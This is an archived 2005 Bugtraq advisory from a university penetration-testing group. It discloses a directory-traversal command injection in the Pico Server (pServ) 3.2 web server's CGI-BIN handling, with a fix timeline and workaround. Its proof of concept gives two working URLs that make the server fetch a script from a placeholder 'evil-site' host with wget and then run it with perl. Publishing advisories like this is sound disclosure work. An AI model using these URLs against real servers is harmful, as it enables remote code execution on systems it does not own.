| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 16 May 2005 16:56:51 +0200
From: "Claus R. F. Overbeck" <bugtraq@...usrfoverbeck.de>
To: bugtraq@...urityfocus.com
Cc: pentest@...informatik.rwth-aachen.de
Subject: Pico Server (pServ) Remote Command Injection
Advisory: Pico Server (pServ) Remote Command Injection
RedTeam found a remote command injection in Pico Server (pServ) which results
in a remote attacker being able to issue arbitrary commands on the server.
Details
=======
Product: Pico Server (pServ)
Affected Version: 3.2(verified), <=3.2 probably too
Immune Version: 3.3
OS affected: all
Security-Risk: very high
Remote-Exploit: yes
Vendor-URL: http://pserv.sourceforge.net/
Vendor-Status: new version available
Advisory-URL: http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010
Advisory-Status: published
CVE: CAN-2005-1365
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365 #)
Introduction
============
From http://pserv.sourceforge.net/
Pico Server is a small web server. It is meant to be portable and
configurable.
* small, portable
* fast
* CGI-BIN support
* auto-indexing of directories
* access and error logging (see p-reporter for an analyzer)
* forking or single-connection at choice
Pico Server (pServ) is written in portable C (K&R style so it can compile on
older compilers too) and sports several options that by means of #define
statements can customize the behavior, the performance and the feature set so
to be able to fit better the the requisites.
If pServ is compiled with support for CGI-BIN a remote attacker is able to
execute any program (with pServ permissions) on the server by traversing out
of the cgi-bin directory.
More Details
============
pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated as
cgi-scripts.
To avoid that a user traverses out of the cgi-bin using traditional /../,
pServ parses the requested url. It increases a counter by one if it parses a
/ (new subdir) and decreases the counter if ist parses /../. If the counter
goes below zero the url is rejected as illegal. Unfortunately an attacker can
avoid beeing rejected, just using enough / in the url (without directory
names between them), so he can traverse out of the cgi-bin by adding some
/../ . This lets the attacker execute any program on the server (with pServ
permissions).
Proof of Concept
================
The following url downloads a script (or executable) to the server:
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl
This is how the script can be executed afterwards:
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl
Workaround
==========
The only workaround is to compile pServ without support for cgi-bin.
Fix
===
The Developers have released Version 3.3. This version should fix the
problem. The changes have not been tested by RedTeam, yet.
Security Risk
=============
The security risk is rated very high because a remote attacker can use this
flaw to execute arbitrary code on the server (with the permissions of pServ).
History
=======
2005-04-29 found
2005-05-02 first attempt to inform developers
2005-05-02 CAN-number assigned
2005-05-04 second attempt to inform developers
2005-05-16 new version released. Advisory published
RedTeam
=======
RedTeam is a penetration testing group working at the Laboratory for
Dependable Distributed Systems at RWTH-Aachen University. You can find more
Information on the RedTeam Project at
http://tsyklon.informatik.rwth-aachen.de/redteam/
Powered by blists - more mailing lists